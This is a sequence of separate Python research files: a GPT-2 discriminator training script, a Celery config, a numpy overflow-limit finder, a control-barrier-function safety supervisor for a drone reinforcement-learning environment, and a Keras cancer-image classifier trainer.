elif not _interval_set: interval = max(job.queue_position(), 2) else: if not _interval_set: interval = 2 # Adjust length of message so there are no artifacts if len(msg) < msg_len: msg += ' ' * (msg_len - len(msg)) elif len(msg) > msg_len: msg_len = len(msg) if msg != prev_msg and not quiet: print('\r%s: %s' % ('Job Status', msg), end='', file=output) prev_msg = msg if not quiet: print('', file=output) def job_monitor(job, interval=None, quiet=False, output=sys.stdout): """Monitor the status of a IBMQJob instance. Args: job (BaseJob): Job to monitor. interval (int): Time interval between status queries. quiet (bool): If True, do not print status messages. output (file): The file like object to write status messages to. By default this is sys.stdout. """ if interval is None: _interval_set = False interval = 5 else: _interval_set = True _text_checker(job, interval, _interval_set, quiet=quiet, output=output)
py
1a3f86b61381e0998c5cf08122cf44c91473a22d
#! /usr/bin/env python3 # coding=utf-8 # This code is licensed under a non-commercial license. import os import sys import argparse from tqdm import trange from torchtext import data as torchtext_data from torchtext import datasets import torch import torch.utils.data as data from torchtext.vocab import Vectors, GloVe, CharNGram, FastText from nltk.tokenize.treebank import TreebankWordDetokenizer import torch import torch.optim import torch.nn.functional as F import numpy as np from IPython import embed from operator import add from run_gpt2 import top_k_logits from style_utils import to_var import copy import pickle from torch.utils.data import DataLoader from torch.utils.data.dataset import random_split import torch.optim as optim torch.manual_seed(0) np.random.seed(0) lab_root = os.path.join(os.path.abspath(os.path.dirname(__file__)), '..', '..') sys.path.insert(1, lab_root) from pytorch_pretrained_bert import GPT2LMHeadModel, GPT2Tokenizer from torch.autograd import Variable tokenizer = GPT2Tokenizer.from_pretrained('/content/drive/MyDrive/passage_generation_testing/gpt2-medium') model = GPT2LMHeadModel.from_pretrained('/content/drive/MyDrive/passage_generation_testing/gpt2-medium') class ClassificationHead(torch.nn.Module): """ Language Model Head for the transformer """ def __init__(self, class_size=5, embed_size=2048): super(ClassificationHead, self).__init__() self.class_size = class_size self.embed_size = embed_size # self.mlp1 = torch.nn.Linear(embed_size, embed_size) # self.mlp2 = (torch.nn.Linear(embed_size, class_size)) self.mlp = (torch.nn.Linear(embed_size, class_size)) def forward(self, hidden_state): # Truncated Language modeling logits (we remove the last token) # h_trunc = h[:, :-1].contiguous().view(-1, self.n_embd) # lm_logits = F.relu(self.mlp1(hidden_state)) # lm_logits = self.mlp2(lm_logits) lm_logits = self.mlp(hidden_state) return lm_logits class Discriminator(torch.nn.Module): def __init__(self): super(Discriminator, self).__init__() self.classifierhead = ClassificationHead() self.model = model self.spltoken = Variable(torch.randn(1, 1, 1024).type(torch.FloatTensor), requires_grad=True) self.spltoken = self.spltoken.repeat(10, 1, 1) self.spltoken = self.spltoken.cuda() def train(self): for param in self.model.parameters(): param.requires_grad = False pass def forward(self, x): x = model.forward_embed(x) x = torch.cat((x, self.spltoken), dim=1) _, x = model.forward_transformer_embed(x, add_one=True) x = self.classifierhead(x[-1][:, -1, :]) x = F.log_softmax(x, dim=-1) return x class Discriminator2(torch.nn.Module): def __init__(self, class_size=5, embed_size=1024): super(Discriminator2, self).__init__() self.classifierhead = ClassificationHead(class_size=class_size, embed_size=embed_size) self.model = model self.embed_size = embed_size def get_classifier(self): return self.classifierhead def train_custom(self): for param in self.model.parameters(): param.requires_grad = False pass self.classifierhead.train() def forward(self, x): x = model.forward_embed(x) hidden, x = model.forward_transformer_embed(x) x = torch.sum(hidden, dim=1) x = self.classifierhead(x) x = F.log_softmax(x, dim=-1) return x class Discriminator2mean(torch.nn.Module): def __init__(self, class_size=5, embed_size=1024): super(Discriminator2mean, self).__init__() self.classifierhead = ClassificationHead(class_size=class_size, embed_size=embed_size) self.model = model self.embed_size = embed_size def get_classifier(self): return self.classifierhead def train_custom(self): for param in self.model.parameters(): param.requires_grad = False pass self.classifierhead.train() def forward(self, x): mask_src = 1 - x.eq(0).unsqueeze(1).type(torch.FloatTensor).cuda().detach() mask_src = mask_src.repeat(1, self.embed_size, 1) x = model.forward_embed(x) hidden, x = model.forward_transformer_embed(x) # Hidden has shape batch_size x length x embed-dim hidden = hidden.permute(0, 2, 1) _, _, batch_length = hidden.shape hidden = hidden * mask_src # / torch.sum(mask_src, dim=-1).unsqueeze(2).repeat(1, 1, batch_length) # hidden = hidden.permute(0, 2, 1) x = torch.sum(hidden, dim=1)/(torch.sum(mask_src, dim=-1).detach() + 1e-10) x = self.classifierhead(x) x = F.log_softmax(x, dim=-1) return x class Dataset(data.Dataset): def __init__(self, X, y): """Reads source and target sequences from txt files.""" self.X = X self.y = y def __len__(self): return len(self.X) def __getitem__(self, index): """Returns one data pair (source and target).""" d = {} d['X'] = self.X[index] d['y'] = self.y[index] return d def collate_fn(data): def merge(sequences): lengths = [len(seq) for seq in sequences] padded_seqs = torch.zeros(len(sequences), max(lengths)).long().cuda() # padding index 0 for i, seq in enumerate(sequences): end = lengths[i] padded_seqs[i, :end] = seq[:end] return padded_seqs, lengths data.sort(key=lambda x: len(x["X"]), reverse=True) # sort by source seq item_info = {} for key in data[0].keys(): item_info[key] = [d[key] for d in data] # input x_batch, _ = merge(item_info['X']) y_batch = item_info['y'] return x_batch, torch.tensor(y_batch, device='cuda', dtype=torch.long) def train_epoch(data_loader, discriminator, device='cuda', args=None, epoch=1): optimizer = optim.Adam(discriminator.parameters(), lr=0.0001) discriminator.train_custom() for batch_idx, (data, target) in enumerate(data_loader): data, target = data.to(device), target.to(device) optimizer.zero_grad() output = discriminator(data) loss = F.nll_loss(output, target) loss.backward(retain_graph=True) optimizer.step() if batch_idx % args.log_interval == 0: print('Relu Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format( epoch, batch_idx * len(data), len(data_loader.dataset), 100. * batch_idx / len(data_loader), loss.item())) def test_epoch(data_loader, discriminator, device='cuda', args=None): discriminator.eval() test_loss = 0 correct = 0 with torch.no_grad(): for data, target in data_loader: data, target = data.to(device), target.to(device) output = discriminator(data) test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability correct += pred.eq(target.view_as(pred)).sum().item() test_loss /= len(data_loader.dataset) print('\nRelu Test set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format( test_loss, correct, len(data_loader.dataset), 100. * correct / len(data_loader.dataset))) def main(): parser = argparse.ArgumentParser(description='Train a discriminator on top of GPT-2 representations') parser.add_argument('--batch-size', type=int, default=64, metavar='N', help='input batch size for training (default: 64)') parser.add_argument('--log-interval', type=int, default=10, metavar='N', help='how many batches to wait before logging training status') parser.add_argument('--epochs', type=int, default=10, metavar='N', help='Number of training epochs') parser.add_argument('--save-model', action='store_true', help='whether to save the model') parser.add_argument('--dataset-label', type=str, default='SST',choices=('SST', 'clickbait', 'toxic')) args = parser.parse_args() batch_size = args.batch_size device = 'cuda' # load sst if args.dataset_label == 'SST': text = torchtext_data.Field() label = torchtext_data.Field(sequential=False) train_data, val_data, test_data = datasets.SST.splits(text, label, fine_grained=True, train_subtrees=True, # filter_pred=lambda ex: ex.label != 'neutral' ) x = [] y = [] d = {"positive": 0, "negative": 1, "very positive": 2, "very negative": 3, "neutral": 4} for i in range(len(train_data)): seq = TreebankWordDetokenizer().detokenize(vars(train_data[i])["text"]) seq = tokenizer.encode(seq) seq = torch.tensor(seq, device=device, dtype=torch.long) x.append(seq) y.append(d[vars(train_data[i])["label"]]) dataset = Dataset(x, y) test_x = [] test_y = [] for i in range(len(test_data)): seq = TreebankWordDetokenizer().detokenize(vars(test_data[i])["text"]) seq = tokenizer.encode(seq) seq = torch.tensor([50256] + seq, device=device, dtype=torch.long) test_x.append(seq) test_y.append(d[vars(test_data[i])["label"]]) test_dataset = Dataset(test_x, test_y) discriminator = Discriminator2mean(class_size=5).to(device) elif args.dataset_label == 'clickbait': # data = pickle.load(open("/home/gilocal/lab/exp/language/datasets/clickbait/clickbait.p", "r")) with open("datasets/clickbait/clickbait_train_prefix.txt") as f: data = [] for d in f: try: data.append(eval(d)) except: continue x = [] y = [] for d in data: try: # seq = tokenizer.encode("Apple's iOS 9 'App thinning' feature will give your phone's storage a boost") try: seq = tokenizer.encode(d["text"]) except: continue seq = torch.tensor([50256] + seq, device=device, dtype=torch.long) x.append(seq) y.append(d['label']) except: pass dataset = Dataset(x, y) train_size = int(0.9 * len(dataset)) test_size = len(dataset) - train_size dataset, test_dataset = torch.utils.data.random_split(dataset, [train_size, test_size]) discriminator = Discriminator2mean(class_size=2).to(device) elif args.dataset_label == 'toxic': # data = pickle.load(open("/home/gilocal/lab/exp/language/datasets/clickbait/clickbait.p", "r")) with open("datasets/toxic/toxic_train.txt") as f: data = [] for d in f: data.append(eval(d)) x = [] y = [] for d in data: try: # seq = tokenizer.encode("Apple's iOS 9 'App thinning' feature will give your phone's storage a boost") seq = tokenizer.encode(d["text"]) device = 'cuda' if(len(seq)<100): seq = torch.tensor([50256] + seq, device=device, dtype=torch.long) else: continue x.append(seq) y.append(int(np.sum(d['label'])>0)) except: pass dataset = Dataset(x, y) print(dataset) print(len(dataset)) train_size = int(0.9 * len(dataset)) test_size = len(dataset) - train_size dataset, test_dataset = torch.utils.data.random_split(dataset, [train_size, test_size]) discriminator = Discriminator2mean(class_size=2).to(device) data_loader = torch.utils.data.DataLoader(dataset=dataset, batch_size=batch_size, shuffle=True, collate_fn=collate_fn) test_loader = torch.utils.data.DataLoader(dataset=test_dataset, batch_size=batch_size, collate_fn=collate_fn) for epoch in range(args.epochs): train_epoch(discriminator=discriminator, data_loader=data_loader, args=args, device=device, epoch=epoch) test_epoch(data_loader=test_loader, discriminator=discriminator, args=args) seq = tokenizer.encode("This is incredible! I love it, this is the best chicken I have ever had.") seq = torch.tensor([seq], device=device, dtype=torch.long) print(discriminator(seq)) if (args.save_model): torch.save(discriminator.state_dict(), "discrim_models/{}_mean_lin_discriminator_{}.pt".format(args.dataset_label, epoch)) torch.save(discriminator.get_classifier().state_dict(), "discrim_models/{}_classifierhead.pt".format(args.dataset_label)) seq = tokenizer.encode("This is incredible! I love it, this is the best chicken I have ever had.") seq = torch.tensor([seq], device=device, dtype=torch.long) print(discriminator(seq)) if __name__ == '__main__': main()
py
1a3f86d8374a1c6286d9de192e904277bb3a7615
import os broker_url = os.environ.get('BROKER_URL') broker_use_ssl = os.environ.get('BROKER_USE_SSL', False) worker_concurrency = 1 worker_prefetch_multiplier = 1 task_acks_late = True
py
1a3f87fb8c9722233ddc9491aaca58044938ae02
"""Compute the largest double precision number that doesn't cause exp/cosh/sinh to overflow. """ import numpy as np np.seterr(all='ignore') def find_overflow(f, a, b): # Start with a binary search while True: mid = 0.5*(a + b) if f(mid) == np.inf: b = mid else: a = mid if abs(b - a) < 1e-12: break # Polish with a brute force search while True: b = np.nextafter(a, np.inf) res = np.exp(b) if res == np.inf: return a else: a = b def main(): a = find_overflow(np.exp, 709.7, 709.9) print("a = {:.20g}, np.exp(a) = {}".format(a, np.exp(a))) a = find_overflow(np.cosh, 710, 711) print("a = {:.20g}, np.cosh(a) = {}".format(a, np.cosh(a))) a = find_overflow(np.sinh, 710, 711) print("a = {:.20g}, np.sinh(a) = {}".format(a, np.sinh(a))) if __name__ == '__main__': main()
py
1a3f889f231cdd1f100c3c394cdf7ea5b3d1c5bc
# load extern modules import gym import csv import time import numpy as np from stable_baselines.bench import Monitor from supervisors.utils import distance_from_obstacles from env.utils import obs_lidar_pseudo import threading from supervisors.cbf import initialize_gp_dynamics, predict_successor_state_gp, initialize_svm_prediction from supervisors.cbf import initialize_svm_prediction_gp from operator import itemgetter from skopt.space import Space from skopt.sampler import Grid # from qpsolvers import solve_qp class Supervisor(Monitor): """ A monitor wrapper for Gym environments to save collisions events Parameters: env (gym.Env): The environment filename (Optional[str]): the location to save a log file, can be None for no log """ def __init__(self, env: gym.Env, filename: str, safety_distance: float or None, visibility: float, safe_info: bool, safe_states: bool, supervisor: str, coordinates_static_obstacles: np.array, lidar_num_bins: int, which_static: int, record_svm_gp: bool, cbf_quadratic: bool, cbf_learn_online: bool, rewards: np.array or None, num_prior_data_cbf: str or None, search_space: str or None, scale_reward: bool): super(Supervisor, self).__init__(env=env, filename=filename) self.safety_distance = safety_distance self.visibility = visibility self.supervisor = supervisor self.lidar_num_bins = lidar_num_bins self.Supervised = 0 self.Intervention = 0 self.SafelyDone = 0 self.scale_reward = scale_reward self.record_svm_gp = record_svm_gp self.Crashed = 0 self.last_teacher_crash = 0 self.timeOut = 0 self.which_static = which_static self.safe_states = safe_states self.total_distance = 0 if supervisor == 'cbf-gp-logical' or supervisor == 'cbf-gp-svm': if num_prior_data_cbf is None: num_prior_data_cbf = '2k' self.gp = initialize_gp_dynamics('2k') if supervisor == 'cbf-gp-svm': if num_prior_data_cbf is None: num_prior_data_cbf = 100000 self.svm = initialize_svm_prediction_gp(num_prior_data=num_prior_data_cbf) self.unsafe_threshold = 0.5 search_space = 'grid' if supervisor == 'cbf-svm': if num_prior_data_cbf is None: num_prior_data_cbf = 2000 self.svm = initialize_svm_prediction(num_prior_data=num_prior_data_cbf) self.unsafe_threshold = 0.6 if supervisor == 'cbf-gp-logical': self.unsafe_threshold = 0.85 search_space = 'random' self.cbf_quadratic = cbf_quadratic if search_space == 'grid': space = Space([(-1., 1.), (-1., 1.)]) grid = Grid(border="include", use_full_layout=False) action_manipulated = grid.generate(space.dimensions, 160) action_manipulated = np.array(action_manipulated) action_manipulated2 = \ np.append(action_manipulated[(action_manipulated[:, 0] < -0.3) * (action_manipulated[:, 1] < -0.3), :], action_manipulated[(action_manipulated[:, 0] > 0.3) * (action_manipulated[:, 1] > 0.3), :], axis=0) action_manipulated2 = \ np.append(action_manipulated2, action_manipulated[(action_manipulated[:, 0] > 0.3) * (action_manipulated[:, 1] < -0.3), :], axis=0) action_manipulated2 = \ np.append(action_manipulated2, action_manipulated[(action_manipulated[:, 0] < -0.3) * (action_manipulated[:, 1] > 0.3), :], axis=0) self.action_manipulated = action_manipulated2 if search_space == 'random': self.action_manipulated = np.array([[-0.1, 0], [0.1, 0], [0, 0.1], [0, -0.1], [-0.25, 0], [0.25, 0], [0, 0.25], [0, -0.25], [-0.1, 0.1], [0.1, 0.1], [-0.1, -0.1], [0.1, -0.1], [-0.25, 0.25], [0.25, 0.25], [-0.25, -0.25], [0.25, -0.25], ############### [0.1, 0.05], [0.05, 0.1], [0.05, -0.1], [-0.25, 0.1], [0.25, 0.8], [0.6, 0.25], [0.3, -0.25], [-0.1, 0.7], [0.9, 0.1], [-0.1, -1], [1, -0.1], [-0.2, 0.75], [0.5, 0.5], [-0.5, -0.5], [0.75, 0], [0.15, 0.05], [0.6, 0.1], [0.4, -0.1], [-0.25, 0.15], [0.25, 0.9], [-0.35, 0.25], [0.5, -0.25], [-0.19, 0.19], [1, 1], [-1, -1], [0, 1], [-1, 0], [0.2, 0.75], [-0.8, 0], [0, -0.58]]) self.cbf_learn_online = cbf_learn_online self.TotalCollisions = [] self.filename = filename self.observation_storage = [] self.safe_info = safe_info self.csv_writer_lock = threading.Lock() self.coordinates_static_obstacles = coordinates_static_obstacles self.rewards = rewards # reward shaping if self.rewards is not None: self.reward_reached_target = self.rewards[0] self.reward_distance = self.rewards[1] self.reward_crashed = self.rewards[2] if self.supervisor == "logical": self.reward_logical = self.rewards[3] if self.supervisor == "cbf-gp-logical" or self.supervisor == "cbf-svm" or self.supervisor == "cbf-gp-svm": self.reward_cbf = self.rewards[3] # default reward settings if self.rewards is None: self.reward_reached_target = 150 self.reward_distance = 1.5 self.reward_crashed = 150 self.reward_cbf = 0.5 self.reward_logical = 100 # add extra static obstacles as boundary of the garden self.extra_obstacles = np.array([[-2.5, -.15], [-2.5, -.35], [-2.5, -.55], [-2.5, -.75], [-2.5, -.95], [-2.5, -1.15], [-2.5, -1.35], [-2.5, -1.55], [-2.5, -1.75], [-2.5, -1.95], [-2.5, -2.15], [-2.5, -2.35], [-2.5, -2.55], [-2.5, -2.75], [-2.5, -2.95], [-2.5, -3.15], [-2.5, -3.35], [2.55, -.25], [2.55, -.35], [2.55, -.55], [2.55, -.75], [2.55, -.95], [2.55, -1.15], [2.55, -1.35], [2.55, -1.55], [2.55, -1.75], [2.55, -1.95], [2.55, -2.15], [2.55, -2.35], [2.55, -2.55], [2.55, -2.75], [2.55, -2.95], [2.55, -3.15], [2.55, -3.35], [-2.50, -0.15], [-2.30, -0.15], [-2.10, -0.15], [-1.90, -0.15], [-1.70, -0.15], [-1.50, -0.15], [-1.30, -0.15], [-1.10, -0.15], [-.90, -0.15], [-.70, -0.15], [-.5, -0.15], [-.3, -0.15], [-.1, -0.15], [0.7, -0.15], [0.9, -0.15], [1.1, -0.15], [1.3, -0.15], [1.5, -0.15], [1.7, -0.15], [1.9, -0.15], [2.1, -0.15], [2.3, -0.15], [2.5, -0.15], [-2.40, -3.4], [-2.20, -3.4], [-2.00, -3.4], [-1.90, -3.4], [-1.70, -3.4], [-1.50, -3.4], [-1.30, -3.4], [-1.10, -3.4], [-.90, -3.4], [-.70, -3.4], [-.50, -3.4], [-.3, -3.4], [-.1, -3.4], [0.1, -3.4], [0.3, -3.4], [0.5, -3.4], [0.7, -3.4], [0.9, -3.4], [1.1, -3.4], [1.3, -3.4], [1.5, -3.4], [1.7, -3.4], [1.9, -3.4], [2.1, -3.4], [2.3, -3.4], [2.5, -3.4], ]) # add extra obstacles as tress in the middle of the garden self.extra_obstacles = np.concatenate((self.extra_obstacles, self.coordinates_static_obstacles)) def step(self, action): """ Get information for the next RL step Parameters: action (float, float): Action vector (speed) Returns: [float]: Observation vector float: reward value observation, reward, done, info """ reward = 0 # check if env needs reset if self.needs_reset: raise RuntimeError("Tried to step environment that needs reset") # pass proposed action to the CBF (if CBF is active) and return the manipulated or the proposed action if self.supervisor == 'cbf-gp-logical' or self.supervisor == 'cbf-svm' or self.supervisor == 'cbf-gp-svm': index = int(len(self.observation_storage) - 1) old_observation = self.observation_storage[index] if self.cbf_learn_online is True: if len(self.observation_storage) > 2: state_x = self.observation_storage[index - 1] state_x = state_x[0:self.lidar_num_bins] state_x = np.asarray(state_x) action_x = self.observation_storage[index] action_x = action_x[28:30] action_x = np.asarray(action_x) state_action_x = np.append(state_x, action_x) state_action_x = state_action_x.reshape(1, -1) state_y = self.observation_storage[index] state_y = state_y[26] if state_y > 0: state_y = int(1) else: state_y = int(-1) state_y = np.asarray(state_y) state_y = state_y.reshape(1, -1) self.svm.fit(state_action_x, state_y) change_proposed_action = False if self.supervisor == 'cbf-gp-svm' or self.supervisor == 'cbf-gp-logical': successor_state_worst = predict_successor_state_gp(self.gp, observation=old_observation[0:self.lidar_num_bins], action=action) if self.supervisor == 'cbf-gp-svm': successor_state_worst = np.sort(successor_state_worst) successor_state_worst = successor_state_worst.reshape(1, -1) probability = self.svm.predict_proba(successor_state_worst) unsafe_probability = probability[0, 1] # print(unsafe_probability) if unsafe_probability > self.unsafe_threshold: change_proposed_action = True if self.supervisor == 'cbf-gp-logical': change_proposed_action = max(successor_state_worst[0]) > self.unsafe_threshold if self.supervisor == 'cbf-svm': # hier nur svm predicten state_action = np.concatenate((old_observation[0:self.lidar_num_bins], action), axis=0) state_action = state_action.reshape(1, -1) probability = self.svm.predict_proba(state_action) unsafe = probability[0, 1] if unsafe > self.unsafe_threshold: change_proposed_action = True if change_proposed_action: if self.supervisor == 'cbf-gp-logical' or self.supervisor == 'cbf-gp-svm': successor_state_worst_manipulated = [] manipulated = predict_successor_state_gp(self.gp, observation=old_observation[0:self.lidar_num_bins], action=self.action_manipulated) if self.supervisor == 'cbf-gp-logical': successor_state_worst_manipulated = np.amax(manipulated, axis=1) if self.supervisor == 'cbf-gp-svm': manipulated = np.sort(manipulated, axis=1) probability = self.svm.predict_proba(manipulated) successor_state_worst_manipulated = probability[:, 1] if not self.cbf_quadratic: index = np.argmin(successor_state_worst_manipulated) distance_org = np.sqrt((self.action_manipulated[index, 0] - action[0]) ** 2 + (self.action_manipulated[index, 1] - action[1]) ** 2) self.total_distance += distance_org action = self.action_manipulated[index] if self.scale_reward: reward -= self.reward_cbf * (distance_org / 2.8) self.total_distance += distance_org if self.cbf_quadratic: if int(sum(successor_state_worst_manipulated < self.unsafe_threshold)) > 0.1: safety_actions = self.action_manipulated[successor_state_worst_manipulated < self.unsafe_threshold] else: safety_actions = self.action_manipulated distance_org = np.sqrt((safety_actions[:, 0] - action[0]) ** 2 + (safety_actions[:, 1] - action[1]) ** 2) index = min(enumerate(distance_org), key=itemgetter(1))[0] action = safety_actions[index] if self.scale_reward: reward -= self.reward_cbf * (distance_org[index] / 2.8) self.total_distance += distance_org[index] #if self.supervisor == 'cbf-svm': # successor_state_unsafe_prob_manipulated = [] # for j in range(0, len(self.action_manipulated)): # state_action = np.concatenate((old_observation[0:self.lidar_num_bins], # self.action_manipulated[j]), axis=0) # state_action = state_action.reshape(1, -1) # probability = self.svm.predict_proba(state_action) # unsafe = probability[0, 1] # successor_state_unsafe_prob_manipulated.append(unsafe) # index = np.argmin(successor_state_unsafe_prob_manipulated) # action = self.action_manipulated[index] self.last_teacher_crash = 1 self.Intervention += 1 self.Supervised = 1 if not self.scale_reward: reward -= self.reward_cbf # step env observation, reward_unity, done, info = self.env.step(action) # manipulate reward with distance to target. maximum distance is ~5. reward -= (observation[0] / 5) * self.reward_distance # save org ibm obs org_observation = observation # check if safely done if done: self.SafelyDone += 1 reward += self.reward_reached_target # compute distances to obstacles distance = distance_from_obstacles(self, observation) # check if drone crashed if not done: if np.min(distance) <= .2: self.Crashed += 1 reward -= self.reward_crashed done = True # check if logical supervisor is active if not done: if self.supervisor == 'logical': if not self.record_svm_gp: if np.min(distance) <= (self.safety_distance + np.random.rand(1) / 25): self.Supervised += 1 self.Intervention += 1 done = True reward -= self.reward_logical # the following is used when recording data if self.record_svm_gp: if np.min(distance) <= 0.29 + np.random.rand(1) / 25: self.Supervised += 1 self.Intervention += 1 done = True reward -= self.reward_logical else: if np.min(distance) <= 0.35 + np.random.rand(1) / 25: self.Supervised += 1 # append reward self.rewards.append(reward) # and didnt end safely if len(self.rewards) == 120: if not done: done = True self.timeOut += 1 # transform observation to lidar like observation observation = obs_lidar_pseudo(self, observation, lidar_num_bins=self.lidar_num_bins, lidar_max_dist=None, lidar_alias=True, lidar_exp_gain=1.0, distance=distance) # append supervisor and save current observation to the storage # first self.lidar_num_bins entries of the observation storage correspond to the lidar # the next entry is the supervised indicator # the next entry is the done indicator # the last 23 entries correspond to the original oracle observation by IBM observation_storage = np.append(observation, self.Supervised) observation_storage = np.append(observation_storage, self.which_static) observation_storage = np.append(observation_storage, self.Intervention) observation_storage = np.append(observation_storage, self.Crashed) observation_storage = np.append(observation_storage, done) observation_storage = np.append(observation_storage, action) observation_storage = np.append(observation_storage, org_observation) self.observation_storage.append(observation_storage) # append the observations of time step t-1 and t-2 to the observation of time step t # when resetting the env the observations of time step t-1 and t-2 are np.zeros() # in time step 1 the observation of time step t-2 are np.zeros() if len(self.rewards) == 1: observation = np.concatenate((observation, self.observation_storage[0][0:(self.lidar_num_bins + 8)]), axis=0) observation_dummy = np.zeros(self.lidar_num_bins + 8) observation = np.concatenate((observation, observation_dummy), axis=0) if len(self.rewards) > 1: observation = np.concatenate((observation, self.observation_storage[len(self.rewards) - 2 ][0:(self.lidar_num_bins + 8)]), axis=0) observation = np.concatenate((observation, self.observation_storage[len(self.rewards) - 1 ][0:(self.lidar_num_bins + 8)]), axis=0) if done: self.needs_reset = True ep_rew = sum(self.rewards) eplen = len(self.rewards) if self.Crashed is True and self.last_teacher_crash == 1: teacher_failed = 1 else: teacher_failed = 0 ep_info = [round(ep_rew, 6), eplen, self.Crashed, self.Supervised, self.Intervention, self.SafelyDone, self.timeOut, round(time.time(), 6), teacher_failed, self.total_distance] self.episode_rewards.append(ep_rew) self.episode_lengths.append(eplen) self.episode_times.append(time.time() - self.t_start) info['episode'] = ep_info if self.safe_states: # and self.Crashed > 0:#################################################### with open(self.filename + 'states.csv', 'a', newline='') as f: writer = csv.writer(f) with self.csv_writer_lock: writer.writerows(self.observation_storage) if self.safe_info: with open(self.filename + 'monitor.csv', 'a', newline='') as f: writer = csv.writer(f) with self.csv_writer_lock: writer.writerow(ep_info) self.TotalCollisions.append(self.Supervised) self.Supervised = 0 self.SafelyDone = 0 self.Intervention = 0 self.Crashed = 0 self.total_distance = 0 self.timeOut = 0 self.rewards = [] self.observation_storage = [] if not done: if self.supervisor == 'logical' and self.record_svm_gp: self.Supervised = 0 self.last_teacher_crash = 0 self.total_steps += 1 return observation, reward, done, info def reset(self, **kwargs): observation = self.env.reset(**kwargs) org_observation = observation distance = distance_from_obstacles(self, observation) while np.min(distance) < .35: observation = self.env.reset(**kwargs) org_observation = observation distance = distance_from_obstacles(self, observation) if np.min(distance) < .35: self.needs_reset = True if np.min(distance) >= .35: self.needs_reset = False self.rewards = [] observation = obs_lidar_pseudo(self, observation, lidar_num_bins=self.lidar_num_bins, lidar_max_dist=None, lidar_alias=True, lidar_exp_gain=1.0, distance=distance) # append supervisor and save current observation to the storage supervised = False observation_storage = np.append(observation, supervised) observation_storage = np.append(observation_storage, self.which_static) intervention = np.array([0]) observation_storage = np.append(observation_storage, intervention) crash_dummy = np.array([0]) observation_storage = np.append(observation_storage, crash_dummy) done = False observation_storage = np.append(observation_storage, done) action_dummy = np.array([0, 0]) observation_storage = np.append(observation_storage, action_dummy) observation_storage = np.append(observation_storage, org_observation) self.observation_storage.append(observation_storage) observation_dummy = np.zeros(self.lidar_num_bins + 8) observation = np.concatenate((observation, observation_dummy), axis=0) observation = np.concatenate((observation, observation_dummy), axis=0) return observation
py
1a3f89376a81097616e8d4ff862c491426e06045
import matplotlib matplotlib.use("Agg") from keras.preprocessing.image import ImageDataGenerator from keras.optimizers import Adagrad from keras.utils import np_utils from sklearn.metrics import classification_report from sklearn.metrics import confusion_matrix import net from configuration import config from imutils import paths import matplotlib.pyplot as plt import numpy as np import argparse import os ap = argparse.ArgumentParser() ap.add_argument("-p", "--plot", type=str, default="plot.png", help="path to output loss/accuracy plot") args = vars(ap.parse_args()) NUM_EPOCHS = 20 INIT_LR = 1e-2 BS = 64 trainPaths = list(paths.list_images(config.TRAIN_PATH)) totalTrain = len(trainPaths) totalVal = len(list(paths.list_images(config.VAL_PATH))) totalTest = len(list(paths.list_images(config.TEST_PATH))) trainLabels = [int(p.split(os.path.sep)[-2]) for p in trainPaths] trainLabels = np_utils.to_categorical(trainLabels) classTotals = trainLabels.sum(axis=0) classWeight = classTotals.max() / classTotals trainAug = ImageDataGenerator( rescale=1 / 255.0, rotation_range=20, zoom_range=0.05, width_shift_range=0.1, height_shift_range=0.1, shear_range=0.05, horizontal_flip=True, vertical_flip=True, fill_mode="nearest") valAug = ImageDataGenerator(rescale=1 / 255.0) trainGen = trainAug.flow_from_directory( config.TRAIN_PATH, class_mode="categorical", target_size=(48, 48), color_mode="rgb", shuffle=True, batch_size=BS) valGen = valAug.flow_from_directory( config.VAL_PATH, class_mode="categorical", target_size=(48, 48), color_mode="rgb", shuffle=False, batch_size=BS) testGen = valAug.flow_from_directory( config.TEST_PATH, class_mode="categorical", target_size=(48, 48), color_mode="rgb", shuffle=False, batch_size=BS) model = CancerNet.build(width=48, height=48, depth=3, classes=2) opt = Adagrad(lr=INIT_LR, decay=INIT_LR / NUM_EPOCHS) model.compile(loss="binary_crossentropy", optimizer=opt, metrics=["accuracy"]) H = model.fit_generator( trainGen, steps_per_epoch=totalTrain // BS, validation_data=valGen, validation_steps=totalVal // BS, class_weight=classWeight, epochs=NUM_EPOCHS) print("[INFO] evaluating network...") testGen.reset() predIdxs = model.predict_generator(testGen, steps=(totalTest // BS) + 1) predIdxs = np.argmax(predIdxs, axis=1) print(classification_report(testGen.classes, predIdxs, target_names=testGen.class_indices.keys())) cm = confusion_matrix(testGen.classes, predIdxs) total = sum(sum(cm)) acc = (cm[0, 0] + cm[1, 1]) / total sensitivity = cm[0, 0] / (cm[0, 0] + cm[0, 1]) specificity = cm[1, 1] / (cm[1, 0] + cm[1, 1]) print(cm) print("acc: {:.4f}".format(acc)) print("sensitivity: {:.4f}".format(sensitivity)) print("specificity: {:.4f}".format(specificity)) model.save('cancer.model') N = NUM_EPOCHS plt.style.use("ggplot") plt.figure() plt.plot(np.arange(0, N), H.history["loss"], label="train_loss") plt.plot(np.arange(0, N), H.history["val_loss"], label="val_loss") plt.plot(np.arange(0, N), H.history["accuracy"], label="train_acc") plt.plot(np.arange(0, N), H.history["val_accuracy"], label="val_acc") plt.title("Training Loss and Accuracy on Dataset") plt.xlabel("Epoch #") plt.ylabel("Loss/Accuracy") plt.legend(loc="lower left") plt.savefig(args["plot"])
py
1a3f89539450fe4845ccff128b18bf331c7d1368
